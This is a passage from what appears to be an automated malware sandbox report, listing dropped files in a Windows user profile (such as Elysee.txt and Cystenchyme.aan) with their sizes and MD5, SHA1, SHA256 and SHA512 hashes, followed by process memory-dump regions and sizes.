        60680c11f047dfd1f31b6121b98e8acdcc886e6b

        SHA256

        408a0fe12e992004153e1a9b7aac32c4e66d9b4841019fcbfb18a8674d709467

        SHA512

        e23eeb6927dcf233cb0159d6796c7f793a0de7169cb6ab421610f55d902aca9ab172ff905f61404a54f5d3ef2a97d99562486f9384db592cdf2113b09b4c02e7

      • C:\Users\Admin\AppData\Local\Temp\Elysee.txt

        Filesize

        2KB

        MD5

        453dc4b9303e5d379ce631ececb64171

        SHA1

        56e8d3f33a7f615a663b52d6decb6f0137668e52

        SHA256

        f1c454f72f9ffdb3448a33937ae1f08624a993614e083a4ef0b2e4c936176bb6

        SHA512

        1618026075c1ffa78280a91fdd713ea82d553bf29d07bb872db7552799d938855fd3d9090cc27497d7e8cd208f3c05b7e9134f754f330e51b63f417049c68717

      • C:\Users\Admin\AppData\Roaming\Cystenchyme.aan

        Filesize

        449KB

        MD5

        a6606652ec2653f860af183b8aac3058

        SHA1

        bb291794a1893882657aea82cd6d92582e2b2a6c

        SHA256

        9988a534348a5f6a8082601a2506633a7394aeb9fcb7d571c458f28f603bd3ed

        SHA512

        eaae2e736f6fc10cfff0a5756a287c689e62f906c3190ecf21d99702469aa2aa635ae28c42ea180d6f5e5cb64fe4d3112045fcf3bb519e31d3c80b60aaf1d824

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOG5NM3CAAAEVL24Q1J8.temp

        Filesize

        7KB

        MD5

        0f92386785a13628a4071822314c0366

        SHA1

        4229682fd835d285140f6419b04d525a86a1a285

        SHA256

        ae7af3d0069215db6c9d485bb711a90b06e5eea059573ebf8ad2b0cd4f3ad572

        SHA512

        ac86a52cf97c21df9ae1f116cc15380ed40a572ea60dc8979ca6d09f3b49f70fdd898ae60a3f2abe6f9815fd9060f30abd79ec788418edb76cfdf46e15511bf6

      • memory/596-406-0x0000000000C80000-0x0000000001CE2000-memory.dmp

        Filesize

        16.4MB

      • memory/596-407-0x0000000000C80000-0x0000000000CC2000-memory.dmp

        Filesize

        264KB

      • memory/2756-382-0x00000000062A0000-0x000000000AF6E000-memory.dmp

        Filesize

        76.8MB

      • memory/2828-368-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

        Filesize

        2.9MB

      • memory/2828-373-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-374-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-369-0x00000000025E0000-0x00000000025E8000-memory.dmp

        Filesize

        32KB

      • memory/2828-367-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

        Filesize

        4KB

      • memory/2828-380-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-381-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

        Filesize

        4KB

      • memory/2828-372-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-371-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-370-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB

      • memory/2828-408-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

        Filesize

        9.6MB